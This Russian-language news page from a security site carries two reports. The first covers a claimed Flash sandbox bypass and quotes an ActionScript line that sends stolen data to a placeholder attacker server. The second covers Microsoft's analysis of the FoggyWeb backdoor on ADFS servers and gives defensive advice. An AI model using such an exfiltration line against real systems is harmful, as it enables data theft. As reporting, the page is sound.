Простой способ обхода «песочницы» Flash

Был найден специалистом в области безопасности. Он утверждает, что даже если файл был запущен локально, то для злоумышленника отправить его на удаленный сервер не составит труда.

Как известно, компания Adobe в своей продукции предусмотрела некоторые меры по защите доступа к сети. Одной из мер является встроенная в приложение «песочница», посредством которой осуществляется контроль доступа к сети через черный список. В этот список включены заголовки протоколов, например HTTP и HTTPS.

Однако, исследователь в области безопасности Билли Риос, утверждает, что можно отправлять файлы на сервер, используя в заголовках запись «file:», но в этом случае данные будут гулять по локальной сети. А для отправки данных на удаленный сервер, по его мнению, вполне подойдет заголовок – mhtml.

Этот заголовок по умолчанию поддерживается в операционных системах семейства Windows, и поэтому данные могут быть отправлены при помощи ActionScript команды: «getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);». Стоит заметить, что для подтверждения своей гипотезы специалист не привел никаких демонстрационных материалов.

Конечно, удивительно, что настолько легко и просто можно обойти одну из «песочниц»
Flash. Однако, это открытие не представляет серьезной опасности, поскольку вряд ли пользователи будут специально скачивать себе на компьютер SWF файл, чтобы просмотреть через плеер. Обычно, такие файлы просматриваются в обозревателе, где предусмотрен иной набор правил.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

APT-группа Nobelium ставит на ADFS-серверы новый бэкдор — FoggyWeb

Эксперты Microsoft изучили новый инструмент постэксплуатации, который APT-группа Nobelium уже пустила в ход. Бэкдор, получивший кодовое имя FoggyWeb, позволяет взломщикам получить данные о настройках службы федерации Active Directory (ADFS), сертификаты для подписи и расшифровки токенов SAML, а также загрузить на сервер дополнительные компоненты.

Преступная группировка, которую в Microsoft называют Nobelium, известна и под другими именами — APT29, The Dukes, Cozy Bear. Эти хакеры часто обновляют свой арсенал и проводят сложные атаки на госструктуры, НКО, научно-исследовательские учреждения, поставщиков ИТ- и телеком-услуг. Им также приписывают авторство прошлогоднего нападения на SolarWinds, получившего большой резонанс.

Первые атаки с использованием FoggyWeb, по данным Microsoft, были зафиксированы в минувшем апреле. Хакеры устанавливают этого работающего в памяти зловреда на взломанный сервер ADFS, чтобы обеспечить себе плацдарм для развития атаки.

Получив админ-доступ к системе, злоумышленники вносят в нее два файла — зашифрованный Windows.Data.TimeZones.zh-PH.pri (FoggyWeb) и version.dll (загрузчик). Вредоносная библиотека загружается в память процесса ADFS по методу подмены DLL; этот компонент отвечает за расшифровку и запуск основного модуля бэкдора.

Активированный FoggyWeb мониторит входящие HTTP-запросы GET и POST, фиксируя используемые схемы URI — список нужных жестко прописан в его коде. Обнаружив совпадение, зловред перехватывает послание и выполняет содержащуюся в нем команду.

 

Ввиду появления новой угрозы Microsoft разослала оповещения заинтересованным клиентам, призвав их усилить защиту ADFS-серверов. С этой целью пользователям рекомендуется сделать следующее:

  • обновить ADFS до последней версии;
  • проверить локальные и облачные ресурсы организации на предмет несанкционированных изменений настроек;
  • удалить неиспользуемые протоколы и функции Windows; 
  • ограничить доступ к ADFS-системам и ужесточить контроль, усилить пароли;
  • поместить используемые для подписи ключи и сертификаты в аппаратное хранилище (HSM).
Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru